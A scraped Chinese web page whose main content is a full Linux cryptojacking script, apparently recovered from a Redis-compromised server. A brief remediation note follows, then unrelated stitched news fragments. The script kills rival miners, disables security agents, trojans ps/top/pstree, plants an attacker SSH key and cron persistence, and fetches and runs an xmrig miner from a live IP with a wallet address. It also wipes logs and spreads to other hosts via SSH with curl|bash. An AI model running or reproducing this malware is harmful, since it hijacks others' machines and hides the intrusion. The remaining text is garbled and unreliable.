rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.tmpnewasss rm -rf /tmp/java rm -rf /tmp/go.sh rm -rf /tmp/go2.sh rm -rf /tmp/khugepageds rm -rf /tmp/.censusqqqqqqqqq rm -rf /tmp/.kerberods rm -rf /tmp/kerberods rm -rf /tmp/seasame rm -rf /tmp/touch rm -rf /tmp/.p rm -rf /tmp/runtime2.sh rm -rf /tmp/runtime.sh rm -rf /dev/shm/z3.sh rm -rf /dev/shm/z2.sh rm -rf /dev/shm/.scr rm -rf /dev/shm/.kerberods rm -f /etc/ld.so.preload rm -rf /etc/systemd/system/systemde.service* rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so chattr -i /etc/ld.so.preload rm -f /etc/ld.so.preload systemctl stop moneroocean_miner.service systemctl stop systemde.service rm -f /usr/local/lib/libioset.so rm -rf /tmp/watchdogs rm -rf /etc/cron.d/tomcat rm -rf /etc/rc.d/init.d/watchdogs rm -rf /usr/sbin/watchdogs rm -f /tmp/kthrotlds rm -f /etc/rc.d/init.d/kthrotlds rm -rf /tmp/.sysbabyuuuuu12 rm -rf /tmp/logo9.jpg rm -rf /tmp/miner.sh rm -rf /tmp/nullcrew rm -rf /tmp/proc rm -rf /tmp/2.sh rm /opt/atlassian/confluence/bin/1.sh rm /opt/atlassian/confluence/bin/1.sh.1 rm /opt/atlassian/confluence/bin/1.sh.2 rm /opt/atlassian/confluence/bin/1.sh.3 rm /opt/atlassian/confluence/bin/3.sh rm /opt/atlassian/confluence/bin/3.sh.1 rm /opt/atlassian/confluence/bin/3.sh.2 rm /opt/atlassian/confluence/bin/3.sh.3 rm -rf /var/tmp/f41 rm -rf /var/tmp/2.sh rm -rf /var/tmp/config.json rm -rf /var/tmp/xmrig rm -rf /var/tmp/1.so rm -rf /var/tmp/kworkerds3 rm -rf /var/tmp/kworkerdssx rm -rf /var/tmp/kworkerds rm -rf /var/tmp/wc.conf rm -rf /var/tmp/nadezhda. rm -rf /var/tmp/nadezhda.arm rm -rf /var/tmp/nadezhda.arm.1 rm -rf /var/tmp/nadezhda.arm.2 rm -rf /var/tmp/nadezhda.x86_64 rm -rf /var/tmp/nadezhda.x86_64.1 rm -rf /var/tmp/nadezhda.x86_64.2 rm -rf /var/tmp/sustse3 rm -rf /var/tmp/sustse rm -rf /var/tmp/moneroocean/ rm -rf /var/tmp/devtool rm -rf /var/tmp/devtools rm -rf /var/tmp/play.sh rm -rf /var/tmp/systemctI rm -rf /var/tmp/.java rm -rf /var/tmp/1.sh rm -rf /var/tmp/conf.n rm -r /var/tmp/lib rm -r /var/tmp/.lib rm -rf /opt/systemd-service.sh rm -rf /opt/.systemd-service.sh rm -rf /root/.systemd-service.sh rm -rf /usr/share/[crypto] chattr -R -ia /usr/bin/TeamTNT/* chattr -R -ia /usr/bin/watchdogd* rm -rf /usr/bin/watchdogd* service crypto stop systemctl stop crypto.service systemctl stop watchdogd service watchdogd stop rm -fr /usr/bin/TeamTNT/* chattr -iau /tmp/lok chmod +700 /tmp/lok rm -rf /tmp/lok sleep 1 chattr -i /tmp/kdevtmpfsi echo 1 > /tmp/kdevtmpfsi chattr +i /tmp/kdevtmpfsi sleep 1 chattr -i /usr/lib/systemd/systemd-update-daily echo 1 > /usr/lib/systemd/systemd-update-daily chattr +i /usr/lib/systemd/systemd-update-daily >/tmp/svcupdate >/tmp/svcguard >/etc/svcupdate >/etc/svcguard >/etc/cron.daily/logrotate >/etc/cron.hourly/0anacron >/etc/rc.d/rc.local #yum install -y docker.io || apt-get install docker.io; docker ps | grep "pocosow" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "gakeaws" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "azulu" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "auto" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "xmr" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "mine" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "slowhttp" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "bash.shell" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk "{print $1}" | xargs -I % docker kill % docker images -a | grep "pocosow" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk "{print $3}" | xargs -I % docker rmi -f % #echo SELINUX=disabled >/etc/selinux/config service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep "aegis" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "Yun" | awk "{print $2}" | xargs -I % kill -9 % rm -rf /usr/local/aegis chattr -R -ia /var/spool/cron chattr -ia /etc/crontab chattr -R -ia /etc/cron.d chattr -R -ia /var/spool/cron/crontabs crontab -r rm -rf /var/spool/cron/* rm -rf /etc/cron.d/* rm -rf /var/spool/cron/crontabs rm -rf /etc/crontab } kill_miner_proc kill_sus_proc() { ps axf -o "pid"|while read procid do ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then cat /proc/$procid/cmdline| grep -a -E "zzh" if [ $? -ne 0 ] then kill -9 $procid else echo "don"t kill" fi fi done ps axf -o "pid %cpu" | awk "{if($2>=40.0) print $1}" | while read procid do cat /proc/$procid/cmdline| grep -a -E "zzh" if [ $? -ne 0 ] then kill -9 $procid else echo "don"t kill" fi done } kill_sus_proc nameserver(){ grep -q 1.1.1.1 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 1.1.1.1" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null } nameserver fuckyou(){ $(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "/usr/bin/supervisor…" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "/app/BitLockerServi…" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null killall -9 xmrig 2>/dev/null 1>/dev/null if [ -f /root/.tmp/xmrig ]; then chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null tmpxmrigfile="/root/.tmp/miner.sh" rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null killall $tmpxmrigfile 2>/dev/null 1>/dev/null chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null ps ax| grep xmrig 2>/dev/null 1>/dev/null fi KINSING1=$(ps ax | grep -v grep | grep "/var/tmp/kinsing") if [ ! -z "$KINSING1" ]; then chattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/null chmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/null pkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/null kill $(ps ax | grep -v grep | grep "/var/tmp/kinsing" | awk "{print $1}") 2>/dev/null 1>/dev/null kill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/null echo " " > /var/tmp/kinsing 2>/dev/null 1>/dev/null rm -f /var/tmp/kinsing 2>/dev/null 1>/dev/null echo "fuckyou" > /var/tmp/kinsing chattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/null history -c 2>/dev/null 1>/dev/null fi KINSING2=$(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi") if [ ! -z "$KINSING2" ]; then chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null pkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null kill $(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi" | awk "{print $1}") 2>/dev/null 1>/dev/null kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null echo " " > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null rm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null echo "fuckyou" > /tmp/kdevtmpfsi chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null history -c 2>/dev/null 1>/dev/null fi } fuckyou downloads() { if [ -f "/usr/bin/curl" ] then echo $1,$2 http_code=`curl -I -m 50 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then curl --connect-timeout 100 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then curl --connect-timeout 100 --retry 100 $1 > $2 else curl --connect-timeout 100 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/cd1" ] then http_code=`cd1 -I -m 50 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then cd1 --connect-timeout 100 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then cd1 --connect-timeout 100 --retry 100 $1 > $2 else cd1 --connect-timeout 100 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/wget" ] then wget --timeout=50 --tries=100 -O $2 $1 if [ $? -ne 0 ] then wget --timeout=100 --tries=100 -O $2 $3 fi elif [ -f "/usr/bin/wd1" ] then wd1 --timeout=100 --tries=100 -O $2 $1 if [ $? -eq 0 ] then wd1 --timeout=100 --tries=100 -O $2 $3 fi fi } unlock_cron() { chattr -R -ia /var/spool/cron chattr -ia /etc/crontab chattr -R -ia /var/spool/cron/crontabs chattr -R -ia /etc/cron.d } lock_cron() { chattr -R +ia /var/spool/cron chattr +ia /etc/crontab chattr -R +ia /var/spool/cron/crontabs chattr -R +ia /etc/cron.d } if [ -f "$rtdir" ] then echo "i am root" mkdir -p /root/.ssh echo "goto 1" >> /etc/zzhs chattr -ia /etc/zzh* chattr -ia /etc/newinit.sh* chattr -ia /root/.ssh/authorized_keys* chattr -R -ia /root/.ssh if [ -f "/bin/ps.original" ] then echo "/bin/ps changed" else mv /bin/ps /bin/ps.original echo "#! /bin/bash">>/bin/ps echo "ps.original $@ | grep -v "zzh|pnscan"">>/bin/ps chmod +x /bin/ps touch -d 20160825 /bin/ps echo "/bin/ps changing" fi if [ -f "/bin/top.original" ] then echo "/bin/top changed" else mv /bin/top /bin/top.original echo "#! /bin/bash">>/bin/top echo "top.original $@ | grep -v "zzh|pnscan"">>/bin/top chmod +x /bin/top touch -d 20160825 /bin/top echo "/bin/top changing" fi if [ -f "/bin/pstree.original" ] then echo "/bin/pstree changed" else mv /bin/pstree /bin/pstree.original echo "#! /bin/bash">>/bin/pstree echo "pstree.original $@ | grep -v "zzh|pnscan"">>/bin/pstree chmod +x /bin/pstree touch -d 20160825 /bin/pstree echo "/bin/pstree changing" fi if [ -f "/bin/chattr" ] then chattrsize=`ls -l /bin/chattr | awk "{ print $5 }"` if [ "$chattrsize" -lt "$chattr_size" ] then yum -y remove e2fsprogs yum -y install e2fsprogs else echo "no need install chattr" fi else yum -y remove e2fsprogs yum -y install e2fsprogs fi unlock_cron rm -f ${crondir} rm -f /etc/cron.d/zzh rm -f /etc/crontab echo "*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1" >> ${crondir} echo "*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/cron.d/zzh echo "0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/crontab echo crontab created lock_cron chmod 700 /root/.ssh/ echo >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0= uc1" > /root/.ssh/authorized_keys cd1 http://195.242.111.238/cleanfda/call.txt wget -q -O- http://195.242.111.238/cleanfda/call.txt file="/etc/zzh" if [ -f "/etc/zzh" ] then filesize1=`ls -l /etc/zzh | awk "{ print $5 }"` if [ "$filesize1" -ne "$miner_size" ] then pkill -f zzh rm /etc/zzh downloads $miner_url /etc/zzh $miner_url_backup else echo "not need download" fi else downloads $miner_url /etc/zzh $miner_url_backup fi downloads $sh_url /etc/newinit.sh $sh_url_backup chmod 777 /etc/zzh if [ -f "/bin/ps.original" ] then ps.original -fe|grep zzh |grep -v grep else ps -fe|grep zzh |grep -v grep fi if [ $? -ne 0 ] then cd /etc echo "not root runing" sleep 5s ./zzh --log-file=/etc/etc --keepalive --no-color --cpu-priority 5 -o dev.fugglesoft.me:5443 --tls --nicehash --coin monero -o 80.211.206.105:9000 -u 88MjAGcUuFzRM2AaUK1qoj9uTp9VBaFzDDUARzmTZL1XUU3DVVkAtxUUb5sHtFMisnSy5dSLQHfUBVdEVgwuwXm5E7LzQ4z.22 --tls --coin monero -o opn.en2an.top:5443 --tls --nicehash --coin monero --background & else echo "root runing....." fi chmod 777 /etc/zzh chattr +ia /etc/zzh chmod 777 /etc/newinit.sh chattr +ia /etc/newinit.sh chmod 600 /root/.ssh/authorized_keys chattr +ia /root/.ssh/authorized_keys else echo "goto 1" > /tmp/zzhs chattr -ia /tmp/zzh* chattr -ia /tmp/newinit.sh* if [ ! -f "/usr/bin/crontab" ] then unlock_cron echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1" >> ${crondir} lock_cron else unlock_cron [[ $cont =~ "newinit.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1") | crontab - lock_cron fi if [ -f "/tmp/zzh" ] then filesize1=`ls -l /tmp/zzh | awk "{ print $5 }"` if [ "$filesize1" -ne "$miner_size" ] then pkill -f zzh rm /tmp/zzh downloads $miner_url /tmp/zzh $miner_url_backup else echo "no need download" fi else downloads $miner_url /tmp/zzh $miner_url_backup fi echo "i am here" downloads $sh_url /tmp/newinit.sh $sh_url_backup ps -fe|grep zzh |grep -v grep if [ $? -ne 0 ] then echo "not tmp runing" cd /tmp chmod 777 zzh sleep 5s ./zzh --log-file=/tmp/tmp --keepalive --no-color --cpu-priority 5 -o dev.fugglesoft.me:5443 --tls --nicehash --coin monero -o 80.211.206.105:9000 -u 88MjAGcUuFzRM2AaUK1qoj9uTp9VBaFzDDUARzmTZL1XUU3DVVkAtxUUb5sHtFMisnSy5dSLQHfUBVdEVgwuwXm5E7LzQ4z.22 --tls --coin monero -o opn.en2an.top:5443 --tls --nicehash --coin monero --background & else echo "tmp runing....." fi chmod 777 /tmp/zzh chattr +i /tmp/zzh chmod 777 /tmp/newinit.sh chattr +i /tmp/newinit.sh fi iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -A OUTPUT -p tcp --dport 10008 -j DROP service iptables reload history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history chmod 444 /usr/bin/chattr chmod 444 /bin/chattr yum install -y bash 2>/dev/null apt install -y bash 2>/dev/null apt-get install -y bash 2>/dev/null if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "curl -o- http://195.242.111.238/cleanfda/init.sh | bash >/dev/null 2>&1 &" & done fi if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "cd1 -o- http://195.242.111.238/cleanfda/init.sh | bash >/dev/null 2>&1 &" & done fi echo "$bbdir" echo "$bbdira" $bbdir -fsSL http://195.242.111.238/cleanfda/is.sh | bash $bbdira -fsSL http://195.242.111.238/cleanfda/is.sh | bash预防问题再次出现redis设置密码
编辑配置文件 vi /opt/myredis/redis.conf
设置密码如下: requirepass heikeshizhenqianredis日志文件配置好
编辑配置文件 vi /opt/myredis/redis.conf
配置日志位置: logfile "/opt/myredis/logs/redis.log"
启动redis: redis-server /opt/myredis/redis.conf安全组开放给指定ip
不要在安全组配置0.0.0.0/0,能确定入方向的ip就一定配置ip,更稳妥的方式是,连同出方向ip也配置好,不能给他们一点机会啊。
关于此次的风险问题算是临时解决了,最后我还是决定把我的服务器还原一遍,因为漏洞攻击的有些配置,临时文件还残留在服务器上。
最后奉劝大家,公网的redis,一定要设置好密码,且是复杂密码。
长期来看,房价极有可能出现贬值潮,购房者要早做准备房地产经过20多年的高速发展,在0815年出现了短暂的市场下跌,接着出现了反弹,基本处于上升期。老百姓对房价上涨预期充满信心,只要凑齐首付,也不惜背上30年的房贷买一套房。但是,从上海房价六连跌,上海二手房成交量跌破2万套,上海楼市降温上海房价六连跌,上海楼市的故事被终结,上海楼市分析第49期。现在上海房价也开始撑不住了,最开始上海楼市只是横盘,现在上海不少二手房房价已经开始往下走了。在过去的9月份里面,上海楼市咖啡节书香韵葡萄酒香,看烟台黄渤海新区文旅深度融合下的城市之韵以气为质,以韵为文。一座城市的文化气韵,关联着历史决定着发展,推动着城市生生不息。回望这个夏天,烟台黄渤海新区城市气韵火出了圈,2022烟台国际葡萄酒节在八角湾国际会展中心启动,烟以千元性价比手机为例,价格便宜究竟是否关键,透过现象看本质看文章听音乐是种享受,想听什么留言告知(都是付费无损包)随着手机市场的突变和发展,不管是什么定位的产品都呈现着数量急速增加的现象,俗称叫做新机更替的速度,反正叫什么都一样,但这样的金价微跌!2022年10月12日各大金店黄金价格多少钱一克?今天是10月12日,不同于昨日的大跌,今日各大金店黄金价格出现微跌,绝大部分金店价格还是保持不变。且今日金价第一的金店与金价倒数第一的金店还是没有发生变化,依旧是周大生与中国黄金,川渝交界处这座400多年前的古镇,为何被称为罕见的清代民居群?秋日生活打卡季重庆是一个拥有众多历史文化古迹的地方,在广袤的山城大地上,分布着许多的历史古镇,其中最为著名的就要看那些入选了重庆十大历史古镇的古镇了,今天我要带着大家前去游览的这座纹眉怎么做才能不后悔?成都纹眉价格多少钱纹眉是一种美化自己的手段,也是现在非常流行的一种美容方式,很多人对自己的眉毛并不是非常满意,所以通常会用纹眉的方式来让自己的眉形得到改善。可是纹眉毕竟也是一种有微创性的操作,所以纹推荐一些可兼职的数据标注众包平台数据标注干货新鲜AI资讯尽在公众号数据标注星球为什么要做兼职?毫无疑问,兼职者首先会给出的答案中绝对会有赚钱这个答案,而且给出这一答案的人会有很多。对于上班族来说,在工作之余兼职能转变思维,正确认识大数据倒计时100天81100记录1。运动10000步,8KM2。大数据的出现开启了一次重大的时代转型,人类社会在政治经济商业科学等各个领域都会发生巨大的,甚至是根本上的改变。3。大数据时代思维的三个变化一是思维转湖南张家界云雾绕峰林碧水映蓝天世界自然遗产地湖南张家界武陵源以独特的张家界地貌闻名中外,被誊为扩大的盆景,缩小的仙境。吴勇兵摄世界自然遗产地张家界武陵源百龙天梯云雾缭绕。吴勇兵摄世界自然遗产地张家界武陵源的天子武汉郑州缩短到2小时以内,高铁新线老线都有好消息今年中秋佳节又逢金秋时节,正是适宜家人团聚出外游玩的好日子。今年上半年,全国多条高铁新线开通,一些线路提速运行让不少人回家和出行的时空距离大大缩短。中秋假期前最后一个工作日的下午,